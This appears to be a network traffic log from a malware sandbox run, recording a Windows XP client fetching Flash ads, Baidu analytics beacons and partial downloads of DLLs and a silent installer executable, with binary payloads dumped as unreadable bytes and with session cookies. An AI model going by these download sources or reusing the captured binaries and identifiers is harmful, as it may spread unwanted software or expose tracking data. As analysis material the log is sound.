Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
Expires: Fri, 13 Jun 2014 17:29:07 GMT
Cache-Control: no-cache
1.....0..HTTP/1.1 302 Moved Temporarily..Server: pws/1.4.2.9..Date: Fr
i, 13 Jun 2014 17:29:08 GMT..Content-Type: text/html..Transfer-Encodin
g: chunked..Connection: keep-alive..Location: hXXp://resource.ws.kukup
lay.com/players/2014/05/23/60130//fengyun.swf..Expires: Fri, 13 Jun 20
14 17:29:07 GMT..Cache-Control: no-cache..1.....0..



GET /media/v1/0f000QfY4TDI-RZtJ88Rf0.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:37 GMT
Content-Type: image/png
Connection: close
Content-Length: 10944
Cache-Control: max-age=31536000
Expires: Fri, 24 Oct 2014 23:44:16 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
.PNG........IHDR...`...`.......w8....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUXHTTP/1.1 200 OK..Server
: JSP2/1.0.27..Date: Fri, 13 Jun 2014 17:29:37 GMT..Content-Type: imag
e/png..Connection: close..Content-Length: 10944..Cache-Control: max-ag
e=31536000..Expires: Fri, 24 Oct 2014 23:44:16 GMT..Last-Modified: Sat
, 25 Apr 2009 07:04:00 GMT..media: media...PNG........IHDR...`...`....
...w8....pHYs................MiCCPPhotoshop ICC profile..x..SwX...
<<< skipped >>>


GET /media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_488077750=media/v1/0f000jtT4CGxjFHdyV6mBf.swf&id_283204763=media/v1/0f000QfY4TDI-RZtJ88Rf0.png&id_488102405=media/v1/0f000Qb3PMHRPyvfvvYfG6.swf&id_425012365=media/v1/0f000KXFAo9s7mobL64F3f.swf&id_451157897=media/v1/0f000AV1EG-sYD_d7YFHc6.jpg&id_488069842=media/v1/0f000AV1EJPWogCd7YFH9s.swf&snapshot=& HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:30 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 33065
Cache-Control: max-age=31536000
Expires: Wed, 15 Apr 2015 15:04:08 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.r...x....xSE.?|.....M...R[.Rn...i.m...h..(RV..$M.H..$..... ..(..l.
.... ...E.}G..}....I..(....<...s....3gf..9s.-...XA...B&....#...{...
pR..]>u\U..&.?T....<.psyA.............#F.(.........P.?l_8...0h$.
0..r...ao....vG.%|..A...........lp..|.&.?.*(./...g.;.l..G...}^... X84.
.8.-..w.u..!.I.....3........&.<W.WG.X}s....y\=9.K.O....F..{.Z.....j
.3?g.S.0.(....\...{.#..........<..j.1..Z8.B.j.#*.VXZd-.Vb .>....
........-A.k..lw......p.H.c....-.F.H....:^. ......L..V...Sh-/.-/..{d.'
...f....Ha....$a....uZ..;1..P[*._....U.Ax%....j..hp.&..~aW....P#...&W.
`....)..."..Y. %6.."5.USW..Z..z..^..X..f..d..F..fe._].E.l.,^|.........
Y.<}.....B./.;...2q..uS7U..r.q.>?ug.=...O.kJ.O...LZy...F........
..w...W.t.C9..s......5...m..F^.r....Q#..o....F]X1w.[n.(.y..{..`.s..].U
.....O.W...]...A./..K...Fi.....7v5/......Hy...^d.~...'.....]=..Q...~..
.?.u..........i.|W.|.....NN......h.]....C..rT...6.q....o;&....F....G}:
......].....g.!.W@...._"}.s.u.9......v-.=0J._5.s.@........].... Yb....
.F...,xP....\v...q...>N7p{SQ~s.5..Z..Qtk .:a.......:.5......}.m....
X.w.......p.......a/..2o...k...}.VC]s..v%....@.:..aS.\r.......p.8.[W&l
t;.Gnl....w...x.M.f.wD9....r..v..l..ZSW;yZ`....P.]n7........)....i..^.
.!........D..*.......~o..wE.J.......X.....i!.M.e.lhtMr......p......b.S
...L$L...\A6..t..N. ..:.>o..OE|..hv..^W......M. 7.....f.YWp...|rO.`
rz\.y.....{...G.j..=sS1V......~....V .z.z.\)S...Cj.#5)..=V.....qx.M...
.....;T..B&N....v_...h..uz.7..;|..q^'[&{....YQ.....,l...\...y.........
Bl.fz....''....D8...........|W4...<zt...j..k.1...5.......c.=..C
<<< skipped >>>


GET /media/id=PWRkPj6&gp=10&time=nHcdPHDsnHD4nf.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: drmcmm.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
media: media
Cache-Control: max-age=31536000
Expires: Fri, 26 Oct 2012 12:24:13 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
Content-Type: image/png
Date: Fri, 13 Jun 2014 17:29:09 GMT
Server: apache
Content-Length: 819
.PNG........IHDR...n...-.....O.^9....gAMA....7.......tEXtSoftware.Adob
e ImageReadyq.e<....IDATx...Kh.Q...y..T-.EQ.....7"][....D........V.
...7..{A....`q..B...T!..R[.5.I.q.3I'...&4.I..p..p/..8s..L.!.N?......].
.D.].v..p....R...)..Z.......sw"..._..J...................Q.Y..P7v=...N
.....!..../nL..^....1.X..l2q.~.7x.....m.. .h.1.E.*HG.....)%....(c..t..
.).OA. .E.G..Z@.....(....U..r.S.nN.......=?]i..Y..k.....:....C.P..G.1t
 ..... W.`q...Ri..E...f.........a..)...........]...8{..c...S\.....K.r.
..iX...0..}~e......^qP...!NP\x.....W....{V.<..W....`....Y.~....&J. 
uP.Jn.j..q!.'.>...D.Gd ...s.....8~........K[...k#........V..''.s\..
J.....0."n.....w(~qb9|TF.M....;'.8..".........f`[email protected]..)..&C.g.
....3......ep..Q.8...{...f.myq2....x.....W..?}.O~.s.i..9FN...s.ze...z.
..#.....#.G(.......8Bq....Q..8Bq[.................IEND.B`.HTTP/1.1 200
 OK..media: media..Cache-Control: max-age=31536000..Expires: Fri, 26 O
ct 2012 12:24:13 GMT..Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT..Co
ntent-Type: image/png..Date: Fri, 13 Jun 2014 17:29:09 GMT..Server: ap
ache..Content-Length: 819...PNG........IHDR...n...-.....O.^9....gAMA..
..7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Kh.Q...y..T-
.EQ.....7"][....D........V....7..{A....`q..B...T!..R[.5.I.q.3I'...&4.I
..p..p/..8s..L.!.N?......]..D.].v..p....R...)..Z.......sw"..._..J.....
..............Q.Y..P7v=...N.....!..../nL..^....1.X..l2q.~.7x.....m.. .
h.1.E.*HG.....)%....(c..t...).OA. .E.G..Z@.....(....U..r.S.nN.......=?
]i..Y..k.....:....C.P..G.1t ..... W.`q...Ri..E...f.........a..)...
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=425984-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:05 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 818624
Content-Range: bytes 425984-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
....L..........P.;Q.t}.....Q. .t.3.......T..............p...Q. .t.3...
....T..............p...Q. .t.3.......T..............p...Q. .t.3.......
T......3..........P.;Q.t}.....Q. .t.3.......T........b.....p...Q. .t.3
.......T........A.....p...Q. .t.3.......T........ .....p...Q. .t.3....
...T......3..........P.;Q.t}.....Q. .t.3.......T..............p...Q. .
t.3.......T..............p...Q. .t.3.......T..............p...Q. .t.3.
......T......3.....l....P.;Q.t}.....Q. .t.3.......T........D.....p...Q
. .t.3.......T........#.....p...Q. .t.3.......T..............p...Q. .t
.3.......T......3..........P.;Q.t}.....Q. .t.3.......T..............p.
..Q. .t.3.......T..............p...Q. .t.3.......T........s.....p...Q.
 .t.3.......T......3.....N....P.;Q.t~..Q...p. .t.3.......T........%...
..Q...p. .t.3.......T..............Q...p. .t.3.......T..............Q.
..p. .t.3.......T......3..........P.;Q.t}.....Q. .t.3.......T.........
.....p...Q. .t.3.......T........u.....p...Q. .t.3.......T........T....
.p...Q. .t.3.......T......3...../...f.P.f;Q.........Q...p. .......3...
....T................P.;Q.t~..Q...p. .t.3.......T..............p...Q. 
.t.3.......T..............p...Q. .t.3.......T..............p...Q. .t.3
.......T......3.....i....P.;Q.t}.....Q. .t.3.......T........A.....p...
Q. .t.3.......T........ .....p...Q. .t.3.......T..............p...Q. .
t.3.......T......3..........P.;Q.t}.....Q. .t.3.......T..............p
...Q. .t.3.......T..............p...Q. .t.3.......T........p.....p...Q
. .t.3.......T......3.....K....P.;Q.t}.....Q. .t.3.......T........
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=17301504-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 17301504-30927031/30927032
Content-Length: 13625528
Age: 4630
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
7u...k.&..-.....Im.....o......f..%<[.v.x.Uk.....MKq..(3.%.s........
.y&....=$.,L.eY......"[email protected]..<.a..$hDA.....O.O:..v..O.<.OM.....
..[z...."...X...MB...........].........N..>#...\.....v../j.}..d..1J
..j9...p....r.;...&..?.......3B?..,/......../f4`...{l.?h.M.4.qk.>#.
.SP..[j.A..}..j.|.../^[email protected]._:...v.{.n.<..a...X.....r[....C.
..t........8.rNr.6..8......DldGs|`.)i..2...k|;.)*`.G. )...>.9....V.
..e@."...8.Ut..Y.....?.. ^.T........e5.n;yr.pJ..W.4/PQ.MJ..{l.-......%
D].;M.(..{av....H........}...]=A...p.uV.&~./...FQ.G......F........$DR.
Xg"...Bq!...X.n....6...An.]..)~... .H...0....Y...\...EF..}.~r..$v.H.{.
*..5.<......a....t........X...s....;.A...r..."...vb.R..z..na.c'.f.O
3...~P`..2)....l..V..2..Q`..eY.e.j......$...^...R..P......e....}......
M^........o...2#..Kf.[...hs.T..J.~"(.....#8$rOG.E...V....;.lBR...#1...
..J.e..._....8~..{PE!....K...^qoum.{S..B.........ch.. 3b........rF....
4=*a.._I..{H...........JP.e.R..w..c...;..%.C9[.i&.U4..R......0/.......
o)...T.{.v_`.l.....n_...O8..NFBK.f71 .d.....l...w6.......t.?.`..m.....
3Z.......vj.X.v1...vG....T.i.....%..q2..#.....4.......\B3.Z..pH]......
4Yk........E.$.h?|f.^Q*.oS............|..?'iO..q................^._ ..
..T7....~.-...E..9.%,...E.Wx;W. wywx.P....Pw.a..T'F...f..:..m...c.D3d.
`....{wP... 4.l.../.. ....'gU....sbs).h|.)8.<.m.1.t...Bp7m.j{d.U...
....1di#P}0..4..d.....Fh..& .<.b#PM.5.G..<.=k.?K...8..MU..`;.}. 
....U.^..h...........;..{....~..\.........Y.....2.l.Lwi..WVH.fU..<.
pa..JP....2.z.^...iY..x{..L..$...D.x./..=....Y..h..z.... k..s.....
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=32768-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:39 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1174752
Content-Range: bytes 32768-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.f.....f..........f.._...........D$.j.j.P.......................V.t$..
.W.x....I........u. .PV....._^............VW.|$...;~.v..jm...~..r..v..
.>_^....D>._^.......3.9A............P...............3.9A........
....Q3.QP.F......F.R...D$.f.F..Q.....Y..............3.QP.F......F.R..f
.F..&..........b..... P.D$.P...................K..............j@P. ...
.........P........u. ....P.f.....f..u. ...............................
...@.................G...............G...............H...............H
...H...........H...H...........H...H.........D$..T$..I.PR.>........
...........$H...H.........D$..I.PQ.L$....................U..j.h.Y..d..
...Pd.%.......SVW...e.3.V.M..u..}..\....}..}..u.......b.]..E.....H..L1
(...E..R SP..;.t.......E......4.E....I....A.....y(.u....j.P.=....E....
........u..}....J.....t..A....y(.u....j.P......M..E......J....M._..^d.
.....[..]........U..j.h.Y..d.....Pd.%.......SVW.}..E..e.3.P...u.......
u..}..u......._.E.....Q..L:(...U..@ SR..;.t.......E......4.E....I....A
.....y(.u....j.P.P....E............}..u....J.....t..A....y(.u....j.P..
....E.P.E...........M..._^d......[..][email protected]..@(...
..B0.....u.........I.....t..A....y(.u....j.P......._......A..D$..y(.u.
...RP...............@([email protected]..................
.t.P..k..Y......................Q................................t.P..
j..Y....................y(.u....RP........................P0..........
....@ R.T$.R.....................d.....j.hhY..Pd.%....S.\$..;...H..D9(
..Vt..H..[....D$........B....x..u..@,..t....[......Q..|:...L$.....
<<< skipped >>>


GET /media/v1/0f000rmn6cn7D14hDeZLyf.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:11 GMT
Content-Type: image/gif
Connection: close
Content-Length: 8087
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
GIF89a..Z.............fbcc_`YVW.......................................
...............YYs.........>@r..~.%.#(~"&v(,x5;.5;.7:xBF.EI.FJ.HL.8
:kMQ.X\.MP.w{.............gi..........................................
......................................................................
.......................................................... .. .. .. ..
 .. .. .. .. ..!..!..!..!..!..!..!..!..!..!..!..'..".."}."{."y"*.."w)1
.07.2:.3:.5<.4;./5.5<.).y6=.7>.6=. 0{8?.9@.;B.DK.MT.Z`.ej.di.
qv.rw.w{.y}.{..}......................................................
...........]ZZ`]].......}}{yywuupnn...................................
......................................................................
......................................................................
.......................!.......,......Z........H......*\......#J.H.b.v
...C..... C..I....(S.\[email protected].*].....P.I.J..
..X.j......`...K.lYf.........p...K....:................... ^...Xm...S.
.....3k....^..C..M.....S.^....p....H.....s...........N...... _........
-M......i...........O......._..}{`..5k................3.v..h..H.....6.
...F.^/.tS.;.f....v... r( .$.h"v.....,....0.(..4.h..8....<.8...<
.N.D.i..H...(.....PF)..TVi..Xf.e..\B....S..d.i._=....l....p..c.C&i....
...|.....v..q7\....&....h...gF*..D.b...f....v.....*....j.......B......
......*e...R..jl..-..J.&9.p.,.AJ........F ...Vk...f....v..... ..s..N:.
........... ....k...../.... -..,.........bo,Ob.0..G..,[email protected]\.. 
.,..$.l....{..,....0....88,..1Sl1..f...-.,4..X..%.....L7-Z.PG-..TW
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=196608-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:45 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1010912
Content-Range: bytes 196608-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
M..E.f..Y.E.P.E.PCS.}..u..u..........-....u..E..1O.....f...Y.E.t..E.P.
E..E..................0.E.P.M1....E...M....;........E..M..........u..E
...N...M.....E.f.E.f..Y.E.P.E.PCS.}..u.................f.E...u_..E.P..
.....YtP.E..M...tF.E.f.M..E.f..X.E.P.E.PCS.}..u.............D....u..E.
.HN.....f...Y.E.t..}........f.}.et.f.}.E.......E..M..........E.f..Xe..
E.P.E.PCS.}..u..!...............u..E...M.....f=-.Y.E.u%.E.f..X-..E.P.E
.PCS..................f.}. u!.E..M...u.!E....u..E...M.....Y.E.f.E...u_
..E.P.n.....YtP.E..M...tF.E.f.M..E.f..X.E.P.E.PCS.}..u..m..........%..
..u..E..)M.....f...Y.E.t..u..M..u.......}..YY.......}....>....u..E.
.E.f.$X..t6.V.fe......Y.......F.P.u.VW3.V.GT.....;.t....t..."u.VVVVV..
.......E.P..E.W.u.HP.5.~....F..Y..W...............u..E..E......}..~..E
...u..M..u..........cYYt..M..}..t..E..M..........u..E.. L.....f....Y.U
.........ctL..su.f...r.f.........f.. u1..{...........3....G...M.......
...M.3....}...~....}....m....}....|....}....#...f..CC.]..P.......p....
...........HH..................t$.E.f9........M..}.........E..E.......
}..~..E..FFf.>^u.....E...]...u.h. ....c....Y.E........E.......h. ..
j.S........j]Yf9.u.F.M.F.C. ...f;..........FFf=-.uZ.U.f..tR...f..]tI..
.FFf;.s.............U.f;.w& E...}[email protected]...
.....M.......................f=]...u...f.>...?....]..}..u......f.. 
u!.M.u...t..E.....u..E.. J.....Y.].f..0..E....u..E...J..Y...jx^f;..].t
>f..Xt8;..E.....t..}..t..M.u..E..E.o....>.u..M.S.w...YYj0[......
u..E...I...}.....Y.].t..m...}..}..E..u..}.......e..R.u..E.SP.1....
<<< skipped >>>


GET /h.js?7aa2cb65324b0d2de0102de5dc741760 HTTP/1.1
Accept: */*
Referer: hXXp://statistics.m0lxcdn.kukuplay.com/play/?f=fengyunzhibo.com&c=693619_1371525642501
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Etag: 765bda5031a3164e610c4ce7d17db7c2
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Connection: Keep-Alive
Content-Length: 5274
Date: Fri, 13 Jun 2014 17:29:18 GMT
Server: apache
...............(function(){var c={id:"7aa2cb65324b0d2de0102de5dc741760
",dm:["play.statistics.kukuplay.com"],etrk:[],js:"tongji.baidu.com/hm-
web/js/",icon:'',br:false,ctrk:false,align:-1,nv:-1,vdur:1800000,age:3
1536000000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R...h.-..z..
g%.maYru.......C......j...{f7..h....,3bz...4)..N...C..N.$(.41.k.4.....
.....~.x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"...2.....<
..k..>..b....i..~opn9E....df.G......Yz...~.u...:........lH`.......k
2...[..&.B4.l&..`s*.Slf.....p....>....?;[email protected]..
4JxH\u....!I..y...(.>J....Cu..r.2U......`....4.,.........q...BJ.R1J
-.P#J..%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.-...M=.]&.$
....q..4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../.....YfZ]rL..)
......h.......w..EZf.....()A.n@.. MB....9...L....$H........Yei."..9._o
[email protected]......{......L;.y..t`.5...< sfY;=jWS~^S~.....
._.........!.......I....v<.n..L V.X....|39........R........]......L
..^r..{s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.(.....<.
..E.......uk.|./....w......>.U....1l_x...#40..;..$?.B.Xlr.....[`..Z
rS,!Z....H..A..I..i..8e]B.G .a.dQ2$.![[email protected]`.q...nl.N.p~..2.C..[...
w.`Yz..G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=?{x$...R.A)
koszny..#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....G.....)...R
..%.Y..[..1./.D..,@S/......0........s'.r..O.$...Y.>.s..........9.@.
..T.......~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B.......?..4.*N
..j]0}..B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^[email protected]>)`...^..
<<< skipped >>>

GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=1330501783&si=7aa2cb65324b0d2de0102de5dc741760&st=3&su=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&v=1.0.59&lv=1&tt=风云直播 HTTP/1.1


Accept: */*
Referer: hXXp://statistics.m0lxcdn.kukuplay.com/play/?f=fengyunzhibo.com&c=693619_1371525642501
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Fri, 13 Jun 2014 17:29:19 GMT
Server: apache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Pragma: no-cache..Content-Type: ima
ge/gif..X-Content-Type-Options: nosniff..Connection: Keep-Alive..Conte
nt-Length: 43..Date: Fri, 13 Jun 2014 17:29:19 GMT..Server: apache..GI
F89a.............!.......,...........L..;..



GET /h.js?d1117fa0662883e59acd91ed0f03b7eb HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Etag: 81ed1599659ef41161d17806c97e230d
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Connection: Keep-Alive
Content-Length: 5282
Date: Fri, 13 Jun 2014 17:29:04 GMT
Server: apache
...............(function(){var c={id:"d1117fa0662883e59acd91ed0f03b7eb
",dm:["mnh.quzhao.com"],etrk:[],js:"tongji.baidu.com/hm-web/js/",icon:
'/hmt/icon/21|gif|20|20',br:false,ctrk:false,align:-1,nv:-1,vdur:18000
00,age:31536000000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R...
